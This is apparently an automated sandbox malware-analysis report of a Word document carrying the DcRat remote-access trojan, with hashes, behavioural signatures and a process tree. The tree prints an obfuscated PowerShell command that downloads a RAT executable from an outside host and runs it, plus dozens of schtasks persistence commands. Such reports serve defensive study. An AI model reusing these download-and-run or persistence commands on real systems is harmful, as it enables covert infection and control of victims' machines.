Analysis
-
max time kernel
143s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
02-08-2022 17:39
Behavioral task
behavioral1
Sample
laburo.doc
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
laburo.doc
Resource
win10v2004-20220722-en
General
-
Target
laburo.doc
-
Size
525KB
-
MD5
9e5e0266ab23b4cbc05272e0376866f7
-
SHA1
b8e7bf8f15fa371fefa5d84e42c5cf3929ca3df6
-
SHA256
7a40a331fa7a62c03e2560207db1e63a2fa30f99d5feb55d4af98508e35bc7f1
-
SHA512
db7feb0d1f5c33c88eae27679c461ea662c008a3a6629f5deed36e391c84ddc3852bf4f9d708caf21bbfb94914e77aa4c80c0d457ac602af2168905c886f9118
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 49 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1216 1592 rundll32.exe WINWORD.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 204 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 112 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4360 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3228 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4784 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 964 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3148 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4484 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 728 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1172 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4276 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 328 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2736 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4848 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4284 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4444 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4924 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1740 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3904 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4232 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1940 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 660 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3344 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2412 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4184 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2564 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4428 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4840 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2860 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4376 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1084 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3844 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4264 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5116 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3052 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4820 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1848 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3820 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3540 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 396 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4720 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4372 4920 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4572 4920 schtasks.exe -
Processes:
resource yara_rule C:\Users\Public\xczuy.exe dcrat C:\Users\Public\xczuy.exe dcrat C:\Refsessionhostsvc\msCrt.exe dcrat C:\Refsessionhostsvc\msCrt.exe dcrat behavioral2/memory/3744-158-0x00000000009C0000-0x0000000000B10000-memory.dmp dcrat C:\Refsessionhostsvc\msCrt.exe dcrat C:\Refsessionhostsvc\OfficeClickToRun.exe dcrat C:\Refsessionhostsvc\OfficeClickToRun.exe dcrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 38 1152 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
xczuy.exemsCrt.exemsCrt.exeOfficeClickToRun.exepid process 3964 xczuy.exe 3744 msCrt.exe 2968 msCrt.exe 2936 OfficeClickToRun.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
msCrt.exemsCrt.exerundll32.exexczuy.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation msCrt.exe Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation msCrt.exe Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation xczuy.exe Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 4 IoCs
Processes:
msCrt.exemsCrt.exedescription ioc process File created C:\Program Files (x86)\Common Files\System\ja-JP\5940a34987c991 msCrt.exe File created C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe msCrt.exe File created C:\Program Files (x86)\Windows NT\TableTextService\en-US\7a0fd90576e088 msCrt.exe File created C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe msCrt.exe -
Drops file in Windows directory 7 IoCs
Processes:
msCrt.exemsCrt.exedescription ioc process File created C:\Windows\servicing\de-DE\smss.exe msCrt.exe File created C:\Windows\OCR\en-us\csrss.exe msCrt.exe File created C:\Windows\PLA\System\WINWORD.exe msCrt.exe File opened for modification C:\Windows\PLA\System\WINWORD.exe msCrt.exe File created C:\Windows\PLA\System\f01a329ae8a6e3 msCrt.exe File created C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe msCrt.exe File created C:\Windows\Performance\WinSAT\DataStore\04c1e7795967e4 msCrt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Creates scheduled task(s) 1 TTPs 48 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3228 schtasks.exe 964 schtasks.exe 4232 schtasks.exe 396 schtasks.exe 1740 schtasks.exe 2564 schtasks.exe 3052 schtasks.exe 1848 schtasks.exe 3540 schtasks.exe 5116 schtasks.exe 3404 schtasks.exe 4720 schtasks.exe 328 schtasks.exe 4924 schtasks.exe 2412 schtasks.exe 4772 schtasks.exe 4264 schtasks.exe 2324 schtasks.exe 4572 schtasks.exe 4276 schtasks.exe 4848 schtasks.exe 3904 schtasks.exe 2860 schtasks.exe 1084 schtasks.exe 1748 schtasks.exe 4444 schtasks.exe 4428 schtasks.exe 4820 schtasks.exe 4372 schtasks.exe 1172 schtasks.exe 4284 schtasks.exe 3344 schtasks.exe 4840 schtasks.exe 3844 schtasks.exe 2736 schtasks.exe 660 schtasks.exe 4376 schtasks.exe 112 schtasks.exe 4360 schtasks.exe 4784 schtasks.exe 3148 schtasks.exe 728 schtasks.exe 3820 schtasks.exe 204 schtasks.exe 4484 schtasks.exe 1940 schtasks.exe 4184 schtasks.exe 1452 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
xczuy.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings xczuy.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1592 WINWORD.EXE 1592 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exemsCrt.exemsCrt.exeOfficeClickToRun.exepid process 1152 powershell.exe 1152 powershell.exe 3744 msCrt.exe 3744 msCrt.exe 3744 msCrt.exe 2968 msCrt.exe 2968 msCrt.exe 2968 msCrt.exe 2968 msCrt.exe 2968 msCrt.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe 2936 OfficeClickToRun.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exemsCrt.exemsCrt.exeOfficeClickToRun.exedescription pid process Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 3744 msCrt.exe Token: SeDebugPrivilege 2968 msCrt.exe Token: SeDebugPrivilege 2936 OfficeClickToRun.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 1592 WINWORD.EXE 1592 WINWORD.EXE 1592 WINWORD.EXE 1592 WINWORD.EXE 1592 WINWORD.EXE 1592 WINWORD.EXE 1592 WINWORD.EXE 1592 WINWORD.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
WINWORD.EXErundll32.exefOrfiLeS.execmd.exepowershell.exexczuy.exeWScript.execmd.exemsCrt.exemsCrt.exedescription pid process target process PID 1592 wrote to memory of 1216 1592 WINWORD.EXE rundll32.exe PID 1592 wrote to memory of 1216 1592 WINWORD.EXE rundll32.exe PID 1216 wrote to memory of 1192 1216 rundll32.exe fOrfiLeS.exe PID 1216 wrote to memory of 1192 1216 rundll32.exe fOrfiLeS.exe PID 1192 wrote to memory of 4208 1192 fOrfiLeS.exe cmd.exe PID 1192 wrote to memory of 4208 1192 fOrfiLeS.exe cmd.exe PID 4208 wrote to memory of 1152 4208 cmd.exe powershell.exe PID 4208 wrote to memory of 1152 4208 cmd.exe powershell.exe PID 1152 wrote to memory of 3964 1152 powershell.exe xczuy.exe PID 1152 wrote to memory of 3964 1152 powershell.exe xczuy.exe PID 1152 wrote to memory of 3964 1152 powershell.exe xczuy.exe PID 3964 wrote to memory of 1088 3964 xczuy.exe WScript.exe PID 3964 wrote to memory of 1088 3964 xczuy.exe WScript.exe PID 3964 wrote to memory of 1088 3964 xczuy.exe WScript.exe PID 1088 wrote to memory of 3200 1088 WScript.exe cmd.exe PID 1088 wrote to memory of 3200 1088 WScript.exe cmd.exe PID 1088 wrote to memory of 3200 1088 WScript.exe cmd.exe PID 3200 wrote to memory of 3744 3200 cmd.exe msCrt.exe PID 3200 wrote to memory of 3744 3200 cmd.exe msCrt.exe PID 3744 wrote to memory of 2968 3744 msCrt.exe msCrt.exe PID 3744 wrote to memory of 2968 3744 msCrt.exe msCrt.exe PID 2968 wrote to memory of 2936 2968 msCrt.exe OfficeClickToRun.exe PID 2968 wrote to memory of 2936 2968 msCrt.exe OfficeClickToRun.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\laburo.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\rundll32.exerundll32 url.dll,OpenURL C:\Users\Public\ali.lnk2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\fOrfiLeS.exe"C:\Windows\system32\fOrfiLeS.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://915111.ru/wp-includes/rat.e^xe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/c pow^ers^hell/W 01 c^u^rl htt^ps://915111.ru/wp-includes/rat.e^xe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /W 01 curl https://915111.ru/wp-includes/rat.exe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xczuy.exe"C:\Users\Public\xczuy.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Refsessionhostsvc\Mt3oQdLiTdARVFkfXUV4PhdFy7ms.vbe"7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Refsessionhostsvc\dJGhX.bat" "8⤵
- Suspicious use of WriteProcessMemory
-
C:\Refsessionhostsvc\msCrt.exe"C:\Refsessionhostsvc\msCrt.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Refsessionhostsvc\msCrt.exe"C:\Refsessionhostsvc\msCrt.exe"10⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Refsessionhostsvc\OfficeClickToRun.exe"C:\Refsessionhostsvc\OfficeClickToRun.exe"11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WINWORDW" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\System\WINWORD.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WINWORD" /sc ONLOGON /tr "'C:\Windows\PLA\System\WINWORD.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WINWORDW" /sc MINUTE /mo 14 /tr "'C:\Windows\PLA\System\WINWORD.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 6 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 10 /tr "'C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 12 /tr "'C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Refsessionhostsvc\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Refsessionhostsvc\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Refsessionhostsvc\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 14 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\odt\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\odt\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Desktop\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default\Desktop\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Desktop\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Refsessionhostsvc\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Refsessionhostsvc\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Refsessionhostsvc\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\odt\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
